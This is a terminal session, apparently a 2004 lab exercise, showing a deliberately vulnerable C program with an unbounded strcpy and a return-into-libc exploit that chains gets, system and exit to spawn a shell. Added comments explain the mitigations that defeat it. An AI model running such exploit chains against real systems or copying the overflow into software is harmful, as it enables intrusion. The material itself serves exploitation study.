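user@kototama:~/Hacking/Code/BO/ReturnIntoLibc/Complex1$ ls
hex2bin  hex2bin.c  retlibc.c  vuln.c
user@kototama:~/Hacking/Code/BO/ReturnIntoLibc/Complex1$ cat vuln.c
/*
 * Deliberately vulnerable target: copies argv[1] into a fixed 500-byte stack
 * buffer with no length check (CWE-121, stack-based buffer overflow).
 *
 * The header name after "#include" was lost in extraction; <stdio.h> and
 * <string.h> are what printf() and strcpy() need, so they are restored here.
 */
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv, char *env[])
{
    char buffer[500];

    printf("called...\n");
    if (argc > 1) {
        /* Unbounded copy of an attacker-controlled argument: any argv[1]
         * longer than sizeof buffer overwrites the saved frame above it.
         * The fix is a bounded copy, e.g.
         *     snprintf(buffer, sizeof buffer, "%s", argv[1]);
         * It is left as-is because this program exists to be overflowed. */
        strcpy(buffer, argv[1]);
    }
    return 0;
}
user@kototama:~/Hacking/Code/BO/ReturnIntoLibc/Complex1$ gcc vuln.c -o vuln
user@kototama:~/Hacking/Code/BO/ReturnIntoLibc/Complex1$ cat retlibc.c
/**
 * Example of return into libc
 *
 * Kototama
 *
 * Review notes (defender's view): every address below is a constant read off
 * one specific machine (see the gdb / /proc/pid/maps comments and the 2004
 * date in the session), so the chain assumes a fixed libc load address and a
 * fixed stack position. On current toolchains the stack-smashing protector
 * stops the return-address overwrite, and ASLR/PIE invalidate the hard-coded
 * addresses; a bounded copy in vuln.c removes the overflow itself.
 *
 * The header name after "#include" was lost in extraction; <string.h>
 * (memset, strlen) and <unistd.h> (execve) are what this file uses.
 */
#include <string.h>
#include <unistd.h>

// all address were found with gdb
// you could use dlsym too
#define ADDR_SYSTEM 0x4005f630
#define ADDR_EXIT 0x4004a8b0
#define ADDR_BASH           /* defined empty and never referenced */
// base of libc + offset
// found in /proc/pid/maps
#define ADDR_POP1 (0x4001f000 + 0x7bae5)   /* parenthesised: macro hygiene */
#define ADDR_GETS 0x4007fd70
// address of the buffer in vuln.c
#define ADDR_ARG_GETS 0xbffff854

#define STR_BASH "/bin/ash"
#define VUL_PATH "./vuln"
#define VUL "vuln"
#define BUFSIZE 500

/* Stores a 4-byte value at array[index]. The pointer cast assumes a 32-bit
 * int and performs an unaligned, aliasing write, which is undefined by the
 * letter of the standard; memcpy(&array[index], &v, 4) is the portable form. */
#define copy(array, index, int_value) *(int *) &array[index] = int_value

int main(void)
{
    /* Payload: BUFSIZE bytes of filler, then ten 4-byte slots, then a NUL. */
    char buffer[BUFSIZE + 10*4 + 1];
    char *argv[] = {VUL, buffer, NULL};
    char *env[] = {STR_BASH, NULL};

    /* Filler stops two bytes short of the slot region; the copy() writes
     * below overlay the slots and the final copy() of 0 also terminates
     * the string before the explicit NUL. */
    memset(buffer, 'B', BUFSIZE + 8*4 - 2);
    buffer[BUFSIZE + 10*4 - 1] = '\0';

    copy(buffer, BUFSIZE + 4, ADDR_GETS);
    copy(buffer, BUFSIZE + 8, ADDR_POP1);
    copy(buffer, BUFSIZE + 12, ADDR_ARG_GETS);
    copy(buffer, BUFSIZE + 16, ADDR_SYSTEM);
    copy(buffer, BUFSIZE + 20, ADDR_POP1);
    copy(buffer, BUFSIZE + 24, ADDR_ARG_GETS);
    copy(buffer, BUFSIZE + 28, ADDR_EXIT);
    copy(buffer, BUFSIZE + 32, 0xbbbbbbbb);
    copy(buffer, BUFSIZE + 36, 0);

    /* Only reached if execve() fails; its return value is not checked. */
    execve(VUL_PATH, argv, env);
    return 0;
}
user@kototama:~/Hacking/Code/BO/ReturnIntoLibc/Complex1$ gcc retlibc.c -o retlibc
user@kototama:~/Hacking/Code/BO/ReturnIntoLibc/Complex1$ ./retlibc
called...
date
Sat May 29 22:32:59 CEST 2004
user@kototama:~/Hacking/Code/BO/ReturnIntoLibc/Complex1$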